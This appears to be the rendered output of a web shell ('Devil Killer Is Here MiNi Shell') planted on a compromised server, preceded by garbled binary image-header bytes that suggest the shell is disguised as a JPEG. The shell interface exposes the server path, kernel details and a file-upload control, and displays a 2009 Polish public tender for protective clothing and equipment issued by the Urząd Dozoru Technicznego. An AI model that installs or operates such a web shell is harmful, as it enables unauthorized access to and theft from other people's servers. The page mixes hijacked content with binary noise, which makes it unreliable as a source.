JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090430/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090430/68811-N-2009.html

<p class="kh_header"><b>Warszawa: Dostawa odzieży i obuwia ochronnego oraz środków ochrony indywidualnej</b><br>
<b>Numer ogłoszenia: 68811 - 2009; data zamieszczenia: 30.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Dozoru Technicznego , ul. Szczęśliwicka 34, 02-353 Warszawa, woj. mazowieckie, tel. 022 5722100, faks 022 5722388.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.udt.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państowa Osoba Prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa odzieży i obuwia ochronnego oraz środków ochrony indywidualnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> II.	   Opis przedmiotu zamówienia

1.	Przedmiotem zamówienia jest dostawa odzieży i obuwia roboczego, odzieży i obuwia ochronnego oraz środków ochrony indywidualnej dla Urzędu Dozoru Technicznego, CLDT oraz oddziałów UDT zgodnie z opisem zawartym w załączniku nr 6 - szczegółowy opis przedmiotu zamówienia.
Ilości:
I. ODZIEŻ I OBUWIE ROBOCZE
1.	Rękawice bawełniane  - 2106 szt.,
2.	Obuwie profilaktyczne - 10 szt;
3.	Fartuch drelichowy - 62 szt.,
4.	Fartuch stylonowy (lekki) - 13 szt.,
5.	Kombinezon krótkotrwałej używalności  - 1483 szt. 
6.	Czapka ocieplana - 264 szt;
7.	Kurtka ocieplana - 313 szt;
8.	Kamizelka ocieplana - 24 szt
II. ODZIEŻ I OBUWIE OCHRONNE ORAZ ŚRODKI OCHRONY INDYWIDUALNEJ
1.	Ubrania robocze -  371 szt;
2.	Kamizelka odblaskowa - 260 szt;
3.	Kurtka (płaszcz) przeciwdeszczowa - 236 szt;
4.	Buty gumowe - 361 szt;
5.	Trzewiki skórzane ochronne - 354 szt;
6.	Nakolanniki - 144 szt;
7.	Kombinezon ochronny - 216 szt;
8.	Rękawice drelichowe - 1207 szt;
9.	Rękawice ocieplane -  430 szt;
10.	Rękawice gumowe - 568 szt;
11.	Kask ochronny - 380 szt;
12.	Wkładki dźwiękoszczelne - 756 szt;
13.	Nauszniki przeciwhałasowe - 27 szt;
14.	Okulary ochronne - 247 szt;
15.	Czapka - 338 szt;
16.	Szelki do pracy na wysokościach -  60 szt;
17.	Maski przeciwgazowe - 35 szt;
18.	Maska przeciwgazowa pełnotwarzowa z pochłaniaczem P22/1 - pochłaniacz wielogazowy klasy ABEK - 14 szt;
19.	Maska przeciwgazowa typu 3S Basic Plus z pochłaniaczem D2055790 - 5 szt; 
20.	Pochłaniacz do maski przeciwgazowej, typ pochłaniacza - D2055790 - 11 szt. 

2.	Odzież i obuwie robocze, odzież i obuwie ochronne oraz środki ochrony indywidualnej będą dostarczone przez Wykonawcę do siedzib jednostek UDT - wykaz adresowy jednostek Urzędu Dozoru Technicznego zawiera załącznik nr 9 do SIWZ, na podstawie zapotrzebowania składanego przez te jednostki do wykonawcy. Dostawy realizowane będą na koszt Wykonawcy.
3.	  Wykonawca zobowiązuje się dostarczyć towary spełniające aktualne wymagania określone w  Polskich Normach zgodnie z opisem przedmiotu zamówienia - załącznik nr 6 do SIWZ.
4.	  Dostarczony przedmiot zamówienia muszą być wysokiej jakości, fabrycznie nowe i nie mogą nosić śladów uszkodzeń zewnętrznych, uprzedniego używania oraz muszą spełniać wszystkie wymogi określone w SIWZ i ofercie.
5.	  Środki ochronny indywidualnej powinny spełniać wymagania określone w Rozporządzeniu Ministra Gospodarki z dnia 21.12.2005 r. w sprawie zasadniczych wymagań dla środków ochrony indywidualnej (Dz. U. 05.259.2173).
6.	   Dodatkowe warunki realizacji przedmiotu zamówienia zawiera także umowa, której wzór stanowi załącznik nr 3 do SIWZ.
7.	  Wzór i kolor symbolu zgodnie z załącznikiem nr 8 do SIWZ. Wykonawca przedstawi Zamawiającemu do akceptacji w wersji elektronicznej wzór loga UDT po podpisaniu umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 35.11.34.00-3, 35.11.34.40-5, 18.10.00.00-0, 18.14.10.00-9, 18.14.30.00-3, 18.22.00.00-7, 18.44.40.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiajacy nie przewiduje wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
a)	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b)	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj.
Wykonawca wykonał, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną dostawę odpowiadającą swoim rodzajem przedmiotowi zamówienia (dostawa odzieży obuwia roboczego ochronnego lub środków ochronny indywidualnej) o wartości nie mniejszej niż 250.000 PLN brutto.
c)	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d)	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

2. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne.
Ocena spełnienia wyżej wymienionych warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wymienionych w dziale IX niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż wyżej wymienione warunki Wykonawca spełnił. 
Niespełnienie któregokolwiek z wyżej wymienionych warunków skutkować będzie wykluczeniem Wykonawcy z postępowania oraz odrzuceniem oferty.

Wykonawcy, którzy nie złożyli oświadczenia o spełnianiu warunków udziału 
w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty będą zawierają błędy zostaną wykluczeni z postępowania z zastrzeżeniem art. 26 ust. 3 ustawy Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawcy wraz z ofertą składają:
POTWIERDZENIE WARUNKÓW UDZIAŁU W POSTĘPOWANIU:
1)	wykaz wykonanych dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem dostawą stanowiącym przedmiot zamówienia (dostawa odzieży obuwia roboczego ochronnego lub środków ochronny indywidualnej) z podaniem ich wartości brutto, daty wykonania i odbiorców (nazwa, adres, tel. fax.) oraz załączenie dokumentów potwierdzających, że te dostawy zostały wykonane należycie; wzór wykazu dostaw stanowi załącznik nr 4 do SIWZ;
2)	oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia publicznego, o których mowa w art. 22 ust.1 ustawy Prawo zamówień publicznych - zgodnie z załącznikiem nr 2 do SIWZ;
3)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;

INNE DOKUMENTY I OŚWIADCZENIE, KTÓRE NALEŻY ZŁOŻYĆ WRAZ Z OFERTĄ:
4)	wypełniony formularz ofertowy z wykorzystaniem wzoru - załącznik nr 1 do SIWZ,
5)	oświadczenie o zatrudnieniu - nie zatrudnieniu podwykonawców - załącznik nr 5 do SIWZ,

UWAGA: w przypadku wskazania podwykonawców, Wykonawca zobowiązany jest załączyć do oferty wypełnione i podpisane wyzej wymienione oświadczenie z zakresem prac, jakie Wykonawca planuje zlecić podwykonawcy. Brak dołączenia do oferty wyżej wymienione oświadczenia Zamawiający uzna za potwierdzenie, że Wykonawca wykona całość prac bez udziału podwykonawców.

6)	wraz z ofertą wykonawcy składają wzór oferowanej kurtki ocieplanej , kamizelki ocieplanej, ubrań roboczych oraz trzewików skórzanych ochronnych ( wzory nie muszą być oznaczone logiem zamawiającego, mogą być wzory oznaczone innym logiem) Zamawiający dopuszcza wykonanie wzorów z innego materiału (innego koloru) pod warunkiem złożenia próbki (kawałka) materiału, z którego będzie wykonany artykuł w przypadku podpisania umowy z Wykonawca. 

7)	dodatkowy opis przedmiotu zamówienia potwierdzający zgodność parametrów oferowanych artykułów innych niż wymienione w pkt. 6 (np. kopie kart katalogowych, oświadczenia producenta, kopie stron z folderów producentów, dystrybutorów, zdjęcia, dodatkowe opisy, z których będzie jednoznacznie wynikać jaki produkt jest oferowany, mogą również być złożone wzory (próbki) tych artykułów itp.) lub zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzające, że dostarczone artykuły odpowiadają określonym   specyfikacjom technicznym;
         UWAGA!!!      wyżej wymienione dokumenty, zaświadczenia, oświadczenia wykonawca składa wraz z ofertą  w oryginale z załączonym tłumaczeniem na język polski, poświadczonym przez Wykonawcę; Jednakże z uwagi na fakt, iż część dokumentów zawiera   jedynie dane techniczne - Zamawiający, zgodnie z art. 9 ust. 3 ustawy, wyraża zgodę na złożenie dokumentów lub ich kopii w języku angielskim i - lub niemieckim (bez konieczności tłumaczenia na język polski) - zgodnie z zapisem zawartym w ogłoszeniu o zamówieniu, 
             Zaleca się, aby wykonawca opisał jakiego artykułu dotyczy dołączony do oferty dokument, zaświadczenie, oświadczenie.
       UWAGA!!!   Zamawiający przed wyborem najkorzystniejszej oferty dopuszcza możliwość wezwania  Wykonawcy do przedstawienia wzorów innych artykułów, których próbek wraz z ofertą Zamawiający nie wymagał, celem sprawdzenia ich zgodności z opisem przedmiotu zamówienia. Wykonawca składający ofertę zobowiązuje się dostarczyć na własny koszt do siedziby Zamawiającego wskazane próbki w terminie 7 dni od wezwania przez Zamawiającego

2.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 1 ppkt. 3) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.

3.	Dokumenty, o których mowa w pkt. 2 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

4.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 2 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Przepis pkt. 3 stosuje się odpowiednio.

5.	Dokumenty są składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę (osobę uprawnioną do podpisania oferty).

6.	Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.

7.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.

8.	Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie, chyba, że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. 

9.	Zamawiający może żądać, w wyznaczonym przez siebie terminie wyjaśnień dotyczących przedstawionych przez Wykonawców dokumentów lub oświadczeń. 

10.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. 
w konsorcjum). W takim przypadku ich oferta musi spełniać następujące wymagania:

- W odniesieniu do wymagań postawionych przez Zamawiającego każdy z przedsiębiorców wspólnie składających ofertę oddzielnie musi udokumentować, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych tj. każdy z partnerów składa osobno dokumenty określone w pkt 1. ppkt. 3). Reszta dokumentów może być złożona wspólnie, przy czym oświadczenie zgodnie z załącznikiem nr 2 do SIWZ każdy Wykonawca musi złożyć osobno w zakresie określonym w pkt. 4) oświadczenia, a w stosunku do punktu 1), 2) i 3) oświadczenie może być złożone wspólnie.

- oferta składana wspólnie musi być podpisana przez przedstawiciela upoważnionego przez wszystkich występujących wspólnie uczestników postępowania lub musi być podpisana przez każdego uczestnika występującego wspólnie,

- oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich  Wykonawców występujących wspólnie, 

- Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego. Umocowanie może wynikać z treści umowy łączącej Wykonawców lub zostać przedłożone oddzielnie wraz z ofertą,

Uwaga: treść pełnomocnictwa powinna dokładnie określać zakres umocowania.  

- Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem (liderem), 

- wypełniając formularz ofertowy, jak również inne dokumenty powołujące się na Wykonawcę; w miejscu np. nazwa i adres Wykonawcy należy wpisać dane dotyczące podmiotów występujących wspólnie.

- Zamawiający przed zawarciem umowy o udzielenie zamówienia publicznego będzie żądał dostarczenia umowy regulującej współpracę podmiotów występujących wspólnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 60</li>
<li>2 - Jakość i estetyka - 40</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.udt.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Dozoru Technicznego w Warszawie 
02-353 Warszawa, ul. Szczęśliwicka 34 pok. nr 7.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.05.2009 godzina 10:00, miejsce: Urząd Dozoru Technicznego w Warszawie 
02-353 Warszawa, ul. Szczęśliwicka 34 pok. nr 7.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com